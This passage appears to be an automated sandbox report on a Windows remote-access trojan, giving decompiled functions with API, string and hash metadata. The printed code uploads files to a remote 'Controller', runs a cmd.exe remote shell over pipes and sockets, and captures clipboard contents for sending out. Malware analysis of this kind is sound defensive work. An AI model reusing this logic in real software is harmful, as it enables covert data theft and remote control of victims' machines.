                    				union _LARGE_INTEGER* _t295;
                    				void* _t297;
                    				void* _t301;
                    				void* _t302;
                    				void* _t303;
                    				void* _t304;
                    				void* _t305;
                    
                    				_t278 = __edx;
                    				_v68 = __ecx;
                    				E0040498B(__ecx);
                    				_t302 = _t301 - 0x10;
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				_t299 = _v68;
                    				E00404A08(__edx);
                    				_v28 = 0x186a0;
                    				_v20 = 0;
                    				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                    				_t310 = _t297 - 0xffffffff;
                    				if(_t297 != 0xffffffff) {
                    					_v80.LowPart = 0;
                    					_v80.HighPart = 0;
                    					__imp__GetFileSizeEx(_t297,  &_v80);
                    					_t203 = _v80.HighPart;
                    					_t117 = _v80;
                    					_v48 = _t203;
                    					_v32 = _t203;
                    					_v52 = _t117;
                    					_v16.LowPart = _t117;
                    					E0040427F(0,  &_v112, _a4);
                    					_t119 = E0041733B( &_v136,  &_v112);
                    					_t303 = _t302 - 0x18;
                    					_t280 = "Uploading file to Controller: ";
                    					E004075C2(0, _t303, _t280, _t297, __eflags, _t119);
                    					_t304 = _t303 - 0x14;
                    					E00402084(0, _t304, "[Info]");
                    					E00416C80(0, _t297);
                    					_t305 = _t304 + 0x30;
                    					E00401FC7();
                    					E00401EF0();
                    					_v36 = 1;
                    					_v40 = 0;
                    					_t126 = E00450880(_v52, _v48, 0x186a0, 0);
                    					_t210 = _t280;
                    					asm("xorps xmm0, xmm0");
                    					_v88 = _t126 + 1;
                    					asm("adc ecx, ebx");
                    					asm("movlpd [ebp-0x3c], xmm0");
                    					_v84.LowPart = _t280;
                    					__eflags = _v48;
                    					if(__eflags < 0) {
                    						L17:
                    						CloseHandle(_t297);
                    						E00404E0B(_t299);
                    						_t198 = 1;
                    					} else {
                    						if(__eflags > 0) {
                    							L5:
                    							_v44 = _v64.HighPart.LowPart;
                    							_v64.HighPart.LowPart = _v64;
                    							_t136 = 0x186a0;
                    							goto L6;
                    							do {
                    								do {
                    									L6:
                    									_t281 = _v32;
                    									__eflags = _v20 - _t281;
                    									if(__eflags >= 0) {
                    										_t210 = _v16.LowPart;
                    										if(__eflags > 0) {
                    											L9:
                    											_t136 = _t210;
                    											_v20 = _t281;
                    											_v28 = _t136;
                    										} else {
                    											__eflags = _t136 - _t210;
                    											if(__eflags > 0) {
                    												goto L9;
                    											}
                    										}
                    									}
                    									_push(_t136);
                    									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
                    									_push(0);
                    									_v12 = _t137;
                    									_v24 = 0;
                    									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                    									__eflags = _t138;
                    									if(_t138 == 0) {
                    										_t306 = _t305 - 0x18;
                    										_t216 = _t305 - 0x18;
                    										_push("SetFilePointerEx error");
                    										goto L23;
                    									} else {
                    										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                    										__eflags = _t148;
                    										if(_t148 == 0) {
                    											_t306 = _t305 - 0x18;
                    											_t216 = _t305 - 0x18;
                    											_push("ReadFile error");
                    											L23:
                    											E00402084(0, _t216);
                    											E00402084(0, _t306 - 0x18, "[ERROR]");
                    											E00416C80(0, _t297);
                    											E0042F4CF(_v12);
                    											CloseHandle(_t297);
                    											goto L24;
                    										} else {
                    											__eflags = _v24;
                    											if(__eflags == 0) {
                    												E0042F4CF(_v12);
                    												CloseHandle(_t297);
                    												E00404E0B(_t299);
                    												_t145 = 1;
                    												goto L25;
                    											} else {
                    												E0040427F(0,  &_v112, _a4);
                    												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
                    												_t305 = _t305 - 0x18;
                    												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
                    												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
                    												E00402F1D(_t305, E00402F93(0x46c238,  &_v136, E00402F93(0x46c238,  &_v160, E00402F93(0x46c238,  &_v184, E00402F1D( &_v208, E00402F93(0x46c238,  &_v232, E00402F1D( &_v256, E00402F93(0x46c238,  &_v280, E00402F93(0x46c238,  &_v304, E00402F93(0x46c238,  &_v328, E00402F93(0x46c238,  &_v352, E00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
                    												_t299 = _v68;
                    												_push(0x52);
                    												_t173 = E00404AA4(0x46c238, _v68, _t171, __eflags);
                    												__eflags = _t173 - 0xffffffff;
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401FC7();
                    												E00401EF0();
                    												__eflags = 0x46c200 | _t173 == 0xffffffff;
                    												if((0x46c200 | _t173 == 0xffffffff) != 0) {
                    													E00404E0B(_t299);
                    													CloseHandle(_t297);
                    													E0042F4CF(_v12);
                    													_t198 = 0;
                    												} else {
                    													goto L14;
                    												}
                    											}
                    										}
                    									}
                    									goto L18;
                    									L14:
                    									E0042F4CF(_v12);
                    									_t136 = _v28;
                    									_v16.LowPart = _v16 - _t136;
                    									_t295 = _v44;
                    									asm("sbb ecx, [ebp-0x10]");
                    									_v36 = _v36 + 1;
                    									_push(0);
                    									_pop(0);
                    									asm("adc [ebp-0x24], ebx");
                    									_t210 = _v64.HighPart.LowPart + _t136;
                    									_v64.HighPart = _t210;
                    									asm("adc edx, [ebp-0x10]");
                    									_v44 = _t295;
                    									__eflags = _t295 - _v48;
                    								} while (__eflags < 0);
                    								if(__eflags > 0) {
                    									goto L17;
                    								} else {
                    									goto L16;
                    								}
                    								goto L18;
                    								L16:
                    								__eflags = _t210 - _v52;
                    							} while (_t210 < _v52);
                    							goto L17;
                    						} else {
                    							__eflags = _v52;
                    							if(_v52 <= 0) {
                    								goto L17;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                    					_push(0x53);
                    					E00404AA4(0, 0x46c2e8, _t278, _t310);
                    					L24:
                    					E00404E0B(_t299);
                    					_t145 = 0;
                    					L25:
                    					_t198 = _t145;
                    				}
                    				L18:
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				return _t198;
                    			}

                    APIs
                      • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                    • __aulldiv.LIBCMT ref: 004065A6
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                    • API String ID: 1319223106-2190262076
                    • Opcode ID: 95301e0d2d65501c773a32fec4aba385de55b1fcfdaf5492f69305316ec70273
                    • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
                    • Opcode Fuzzy Hash: 95301e0d2d65501c773a32fec4aba385de55b1fcfdaf5492f69305316ec70273
                    • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E10596458(char _a4) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				char _v40;
                    				char _v64;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				long _t52;
                    				void* _t56;
                    				void* _t66;
                    				void* _t70;
                    				void* _t79;
                    				CHAR* _t80;
                    				int _t98;
                    				intOrPtr* _t107;
                    				intOrPtr _t138;
                    				signed int _t146;
                    				signed int _t147;
                    				intOrPtr* _t150;
                    				long _t151;
                    				void* _t155;
                    				intOrPtr* _t156;
                    
                    				_t156 = _t155 - 0x3c;
                    				_push(_t146);
                    				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
                    				_t147 = _t146 | 0xffffffff;
                    				_t98 = 0;
                    				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
                    					E105BFF82(0x46dce8);
                    					_t160 =  *0x46dce8 - _t147;
                    					if( *0x46dce8 == _t147) {
                    						E105956BC(0, 0x46dc60, 0);
                    						E105C030C(_t160, 0x4527b3);
                    						 *_t156 = 0x46dce8;
                    						E105BFF43();
                    					}
                    				}
                    				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
                    					E105BFF82(0x46dcc8);
                    					_t162 =  *0x46dcc8 - _t147;
                    					if( *0x46dcc8 == _t147) {
                    						E10592F43(_t98, 0x46dcf0);
                    						E105C030C(_t162, 0x4527a9);
                    						E105BFF43(0x46dcc8);
                    					}
                    				}
                    				_t100 =  &_v40;
                    				E10592F43(_t98,  &_v40);
                    				_t139 = 0x46c2d0;
                    				_v8 = _t98;
                    				if( *0x46bae2 != _t98) {
                    					L12:
                    					_v12 = _t98;
                    					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
                    					if(_v12 <= _t98) {
                    						_t156 = _t156 - 0x18;
                    						E10592EF2(_t98, _t156, 0x45f6bc);
                    						_push(0x62);
                    						_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, __eflags);
                    						goto L21;
                    					}
                    					_push(_v12);
                    					_t56 = E105CA364(_t100);
                    					_t140 = _t56;
                    					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
                    					if(_v16 <= _t98) {
                    						L19:
                    						L105CA35F(_t140);
                    						_t139 = 0x46c2d0;
                    						goto L21;
                    					}
                    					if(_v8 <= _t98) {
                    						L17:
                    						E10592EF2(_t98,  &_v64, _t140);
                    						_t156 = _t156 - 0x18;
                    						_t107 = _t156;
                    						_push(_v16);
                    						_push(_t98);
                    						L18:
                    						E10596882(_t98, _t107, 0x45f6c0, _t172);
                    						_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, _t172, 0x62,  &_v64);
                    						E10592E35();
                    						goto L19;
                    					}
                    					_t66 = E105CA37E(_t140, E10592E03( &_v40), _v8);
                    					_t156 = _t156 + 0xc;
                    					_t172 = _t66;
                    					if(_t66 != 0) {
                    						goto L17;
                    					}
                    					E10592EF2(_t98,  &_v64, _t140);
                    					_t156 = _t156 - 0x18;
                    					_t107 = _t156;
                    					_push(_v16 - _v8);
                    					_push(_v8);
                    					goto L18;
                    				} else {
                    					_t70 = E105968DD(0x45f6c0);
                    					_t164 = _t70;
                    					if(_t70 == 0) {
                    						L26:
                    						E10595C79(0x46dc60);
                    						CloseHandle( *0x46dcd0);
                    						CloseHandle( *0x46dcec);
                    						 *0x46bae2 = _t98;
                    						_t98 = 1;
                    						L27:
                    						E10592E35();
                    						E10592E35();
                    						return _t98;
                    					}
                    					E10596879(_t98, 0x46dcf0, E105CA6F8(_t98, _t164, 0x45f6c8));
                    					E10596870(_t98, 0x46dcf0, 0x46c2d0, 0x45f6d4);
                    					_t150 =  *0x45327c;
                    					_push(_t98);
                    					_push(0x46dc08);
                    					_push(0x46dccc);
                    					_push(0x46dce4);
                    					 *0x46dc08 = 0xc;
                    					 *0x46dc10 = 1;
                    					 *0x46dc0c = _t98;
                    					if( *_t150() == 0) {
                    						goto L27;
                    					}
                    					_push(_t98);
                    					_push(0x46dc08);
                    					_push(0x46dcec);
                    					_push(0x46dcd0);
                    					if( *_t150() == 0) {
                    						goto L27;
                    					}
                    					_t151 = 0x44;
                    					E105C2D6E(0x46dc18, 0x46dc18, _t98, _t151);
                    					0x46dc18->cb = _t151;
                    					 *0x46dc44 = 0x101;
                    					 *0x46dc48 = 0;
                    					 *0x46dc50 =  *0x46dce4;
                    					_t79 =  *0x46dcec;
                    					 *0x46dc54 = _t79;
                    					 *0x46dc58 = _t79;
                    					_t80 = E10592E03(0x46dcf0);
                    					 *0x46bae2 = CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
                    					E10596879(_t98, 0x46c2d0, 0x45f6bc);
                    					 *0x46bae3 = 1;
                    					E105957F9(0x46dc60);
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					E10595876(0x45f6c0);
                    					_t156 = _t156 + 0xc - 0xfffffffffffffff8;
                    					E10592F5A(_t98, _t156, 0x45f6c0, CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
                    					_push(0x93);
                    					_t100 = 0x46dc60;
                    					_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
                    					Sleep(0x12c);
                    					if( *0x46bae2 == _t98) {
                    						goto L26;
                    					}
                    					_t139 = 0x46c2d0;
                    					do {
                    						goto L12;
                    						L21:
                    						_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                    						_t100 = _t139;
                    						 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                    						if(E105932F7() == 0) {
                    							_v8 = _t98;
                    						} else {
                    							E10596870(_t98, _t139, _t139, 0x45f6d8);
                    							E10592E1B( &_v40, _t139);
                    							_t52 = E105932F7();
                    							WriteFile( *0x46dccc, E10592E03(_t139), _t52,  &_v8, _t98);
                    							_t100 = _t139;
                    							E10596879(_t98, _t139, 0x45f6bc);
                    						}
                    						Sleep(0x64);
                    					} while ( *0x46bae3 != _t98);
                    					TerminateProcess(0x46dcd4->hProcess, _t98);
                    					CloseHandle( *0x46dcd8);
                    					CloseHandle( *0x46dcd4);
                    					goto L26;
                    				}
                    			}


                    APIs
                    • __Init_thread_footer.LIBCMT ref: 105964AA
                      • Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986
                    • __Init_thread_footer.LIBCMT ref: 105964E7
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 105965FB
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 10596662
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1059668A
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 105966B3
                      • Part of subcall function 105C030C: __onexit.LIBCMT ref: 105C0312
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 105967A0
                    • Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 105967B9
                    • TerminateProcess.KERNEL32(00000000), ref: 105967D2
                    • CloseHandle.KERNEL32 ref: 105967DE
                    • CloseHandle.KERNEL32 ref: 105967EA
                    • CloseHandle.KERNEL32 ref: 10596800
                    • CloseHandle.KERNEL32 ref: 1059680C
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$FileInit_thread_footerProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                    • String ID: cmd.exe
                    • API String ID: 934506284-723907552
                    • Opcode ID: 8950dcda3638024480c7a18c1cd1ed1f1aa0053088cfa9993a61d707bf24412b
                    • Instruction ID: ff8563d0b8707b9a09e01589d2a6b646b482a716bd4f8eef2c7b4087b96245ba
                    • Opcode Fuzzy Hash: 8950dcda3638024480c7a18c1cd1ed1f1aa0053088cfa9993a61d707bf24412b
                    • Instruction Fuzzy Hash: 4191EA75F00208ABCB019BB4DD8AE6E3F79EB84741B10407AF405A7161EFF46E45D76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00412CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                    				void* __ebx;
                    				int _t10;
                    				void* _t20;
                    				void* _t22;
                    				void* _t31;
                    				struct HWND__* _t38;
                    				void* _t57;
                    				void* _t61;
                    				void* _t64;
                    				void* _t66;
                    
                    				_t55 = __edx;
                    				_t10 = OpenClipboard(_t38);
                    				_t68 = _t10;
                    				if(_t10 != 0) {
                    					EmptyClipboard();
                    					E00401E49( &_a16, _t55, _t68, _t38);
                    					_t57 = GlobalAlloc(0x2000, E00402489() + 2);
                    					_t20 = GlobalLock(_t57);
                    					E00401E49( &_a12, _t55, _t68, _t38);
                    					_t22 = E00402489();
                    					E004324E0(_t20, E00401F95(E00401E49( &_a8, _t55, _t68, _t38)), _t22);
                    					_t66 = _t64 + 0xc;
                    					GlobalUnlock(_t57);
                    					SetClipboardData(0xd, _t57);
                    					CloseClipboard();
                    					if(OpenClipboard(_t38) != 0) {
                    						_t61 = GetClipboardData(0xd);
                    						_t31 = GlobalLock(_t61);
                    						GlobalUnlock(_t61);
                    						CloseClipboard();
                    						_t50 =  !=  ? _t31 : 0x45f724;
                    						E0040427F(_t38,  &_a36,  !=  ? _t31 : 0x45f724);
                    						_t55 =  &_a32;
                    						E0041739C(_t38, _t66 - 0x18,  &_a32);
                    						_push(0x6b);
                    						E00404AA4(_t38, 0x46c780,  &_a32, _t31);
                    						E00401EF0();
                    					}
                    				}
                    				_t7 =  &_a16; // 0x404538
                    				E00401E74(_t7, _t55);
                    				E00401FC7();
                    				E00401FC7();
                    				return 0;
                    			}


                    APIs
                    • OpenClipboard.USER32 ref: 00412CEF
                    • EmptyClipboard.USER32 ref: 00412CFD
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00412D1D
                    • GlobalLock.KERNEL32 ref: 00412D26
                    • GlobalUnlock.KERNEL32(00000000), ref: 00412D5C
                    • SetClipboardData.USER32 ref: 00412D65
                    • CloseClipboard.USER32 ref: 00412D82
                    • OpenClipboard.USER32 ref: 00412D89
                    • GetClipboardData.USER32 ref: 00412D99
                    • GlobalLock.KERNEL32 ref: 00412DA2
                    • GlobalUnlock.KERNEL32(00000000), ref: 00412DAB
                    • CloseClipboard.USER32 ref: 00412DB1
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: 8E@
                    • API String ID: 3520204547-787191786
                    • Opcode ID: 404aa65ec40ebe7d1aded3c4467f276cb2d1509549b123ebf3c107b077ab3c0b
                    • Instruction ID: b9e1d7fbe4d1e951bf5af5a2783573fa20d530b0938c210f703dd27beeaacb0f
                    • Opcode Fuzzy Hash: 404aa65ec40ebe7d1aded3c4467f276cb2d1509549b123ebf3c107b077ab3c0b
                    • Instruction Fuzzy Hash: B42165711043005BD305BF72DC499BE76A9AF94747F00043FF902A21E3DF388A04866A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E00418E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				struct tagPOINT _v12;
                    				void* _t16;
                    				struct HMENU__* _t17;
                    				void* _t20;
                    				void* _t24;
                    
                    				_t16 = _a8 - 1;
                    				if(_t16 == 0) {
                    					_t17 = CreatePopupMenu();
                    					 *0x46beb8 = _t17;
                    					AppendMenuA(_t17, 0, 0, "Close");
                    					L15:
                    					return 0;
                    				}
                    				_t20 = _t16 - 0x110;
                    				if(_t20 == 0) {
                    					if(_a12 != 0) {
                    						goto L15;
                    					}
                    					Shell_NotifyIconA(2, 0x46bec0);
                    					ExitProcess(0);
                    				}
                    				if(_t20 == 0x2f0) {
                    					_t24 = _a16 - 0x201;
                    					if(_t24 == 0) {
                    						if(IsWindowVisible( *0x46bebc) == 0) {
                    							ShowWindow( *0x46bebc, 9);
                    							SetForegroundWindow( *0x46bebc);
                    						} else {
                    							ShowWindow( *0x46bebc, 0);
                    						}
                    						goto L15;
                    					}
                    					if(_t24 == 3) {
                    						GetCursorPos( &_v12);
                    						SetForegroundWindow(_a4);
                    						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
                    						goto L15;
                    					}
                    					_push(_a16);
                    					_push(_a12);
                    					_push(0x401);
                    					L7:
                    					return DefWindowProcA(_a4, ??, ??, ??);
                    				}
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_a8);
                    				goto L7;
                    			}


                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 00418EA5
                    • GetCursorPos.USER32(?), ref: 00418EB4
                    • SetForegroundWindow.USER32(?), ref: 00418EBD
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00418ED7
                    • Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418F28
                    • ExitProcess.KERNEL32 ref: 00418F30
                    • CreatePopupMenu.USER32 ref: 00418F36
                    • AppendMenuA.USER32 ref: 00418F4B
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: 313875355ef37223d46e2d47b1dd1b85a0bcac7bde8e4359fd53db1a69d1d3b6
                    • Instruction ID: fe3cc472e6e4562c17b13041cd06cea2fd9b767a49036bc03de1ccffac53e5cc
                    • Opcode Fuzzy Hash: 313875355ef37223d46e2d47b1dd1b85a0bcac7bde8e4359fd53db1a69d1d3b6
                    • Instruction Fuzzy Hash: 38210731104209BFDB064FA4ED0DAAA3B66EB04743F10452AFA05D41B1DFB6DAA1EB5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0043F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				signed int _v8;
                    				char _v21;
                    				intOrPtr _v22;
                    				struct _cpinfo _v28;
                    				void* _v32;
                    				void* _v36;
                    				void* _v40;
                    				intOrPtr* _v44;
                    				signed int _v48;
                    				void* _v52;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				intOrPtr* _v64;
                    				signed int* _v68;
                    				void* _v72;
                    				char _v76;
                    				signed int _t101;
                    				signed int _t123;
                    				signed short _t126;
                    				void* _t130;
                    				void* _t134;
                    				void* _t137;
                    				void* _t138;
                    				intOrPtr _t139;
                    				void* _t141;
                    				signed int _t142;
                    				intOrPtr* _t143;
                    				signed char _t160;
                    				signed char _t165;
                    				signed int _t166;
                    				void* _t168;
                    				signed int _t170;
                    				void* _t179;
                    				signed int* _t180;
                    				signed int* _t181;
                    				signed int _t182;
                    				signed char* _t189;
                    				signed char* _t190;
                    				signed int _t192;
                    				void* _t193;
                    				intOrPtr _t197;
                    				short* _t209;
                    				intOrPtr* _t211;
                    				intOrPtr* _t215;
                    				signed int _t216;
                    				signed int _t217;
                    				void* _t218;
                    				void* _t219;
                    
                    				_t101 =  *0x46a00c; // 0xee31ea10
                    				_v8 = _t101 ^ _t217;
                    				_t211 = _a4;
                    				_t170 = 0;
                    				_v64 = _t211;
                    				_v32 = 0;
                    				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                    				_v36 = 0;
                    				_v40 = 0;
                    				_v52 = 0;
                    				_v76 = _t211;
                    				_v72 = 0;
                    				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                    					__eflags =  *(_t211 + 0x8c);
                    					if( *(_t211 + 0x8c) != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					 *(_t211 + 0x8c) = _t170;
                    					__eflags = 0;
                    					 *(_t211 + 0x90) = _t170;
                    					 *_t211 = 0x4577b8;
                    					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a38;
                    					 *((intOrPtr*)(_t211 + 0x98)) = 0x457bb8;
                    					 *((intOrPtr*)(_t211 + 4)) = 1;
                    					L41:
                    					return E0042FD1B(_v8 ^ _t217);
                    				}
                    				_t106 = _t211 + 8;
                    				_v44 = 0;
                    				if( *(_t211 + 8) != 0) {
                    					L3:
                    					_v44 = E0043F348(_t172, 1, 4);
                    					E004401F5(_t170);
                    					_v32 = E0043F348(_t172, 0x180, 2);
                    					E004401F5(_t170);
                    					_v36 = E0043F348(_t172, 0x180, 1);
                    					E004401F5(_t170);
                    					_v40 = E0043F348(_t172, 0x180, 1);
                    					E004401F5(_t170);
                    					_t197 = E0043F348(_t172, 0x101, 1);
                    					_v52 = _t197;
                    					E004401F5(_t170);
                    					_t219 = _t218 + 0x3c;
                    					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                    						L36:
                    						E004401F5(_v44);
                    						E004401F5(_v32);
                    						E004401F5(_v36);
                    						E004401F5(_v40);
                    						_t170 = 1;
                    						__eflags = 1;
                    						goto L37;
                    					} else {
                    						_t123 = _t170;
                    						do {
                    							 *(_t123 + _t197) = _t123;
                    							_t123 = _t123 + 1;
                    						} while (_t123 < 0x100);
                    						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                    							goto L36;
                    						}
                    						_t126 = _v28;
                    						_t235 = _t126 - 5;
                    						if(_t126 > 5) {
                    							goto L36;
                    						}
                    						_t28 = _t197 + 1; // 0x1
                    						_v48 = _t126 & 0x0000ffff;
                    						_t192 = 0xff;
                    						_t130 = E0044480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						_t236 = _t130;
                    						if(_t130 == 0) {
                    							goto L36;
                    						}
                    						_t34 = _t197 + 1; // 0x1
                    						_t134 = E0044480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						if(_t134 == 0) {
                    							goto L36;
                    						}
                    						if(_v48 <= 1 || _v22 == _t170) {
                    							L22:
                    							_v60 = _v32 + 0x100;
                    							_t137 = E004493AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                    							_t219 = _t219 + 0x1c;
                    							if(_t137 == 0) {
                    								goto L36;
                    							}
                    							_t193 = _v32;
                    							_t138 = _t193 + 0xfe;
                    							 *_t138 = 0;
                    							_t179 = _v36;
                    							_v32 = _t138;
                    							_t139 = _v40;
                    							 *(_t179 + 0x7f) = _t170;
                    							_t180 = _t179 - 0xffffff80;
                    							 *(_t139 + 0x7f) = _t170;
                    							_v68 = _t180;
                    							 *_t180 = _t170;
                    							_t181 = _t139 + 0x80;
                    							_v56 = _t181;
                    							 *_t181 = _t170;
                    							if(_v48 <= 1 || _v22 == _t170) {
                    								L32:
                    								_t182 = 0x3f;
                    								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								asm("movsb");
                    								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                    								asm("movsw");
                    								asm("movsb");
                    								_t215 = _v64;
                    								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                    									asm("lock xadd [ecx], eax");
                    									if((_t142 | 0xffffffff) == 0) {
                    										E004401F5( *(_t215 + 0x90) - 0xfe);
                    										E004401F5( *(_t215 + 0x94) - 0x80);
                    										E004401F5( *(_t215 + 0x98) - 0x80);
                    										E004401F5( *((intOrPtr*)(_t215 + 0x8c)));
                    									}
                    								}
                    								_t143 = _v44;
                    								 *_t143 = 1;
                    								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                    								 *_t215 = _v60;
                    								 *(_t215 + 0x90) = _v32;
                    								 *(_t215 + 0x94) = _v68;
                    								 *(_t215 + 0x98) = _v56;
                    								 *(_t215 + 4) = _v48;
                    								L37:
                    								E004401F5(_v52);
                    								goto L41;
                    							} else {
                    								_t189 =  &_v21;
                    								while(1) {
                    									_t160 =  *_t189;
                    									if(_t160 == 0) {
                    										break;
                    									}
                    									_t216 =  *(_t189 - 1) & 0x000000ff;
                    									if(_t216 > (_t160 & 0x000000ff)) {
                    										L30:
                    										_t189 =  &(_t189[2]);
                    										if( *(_t189 - 1) != _t170) {
                    											continue;
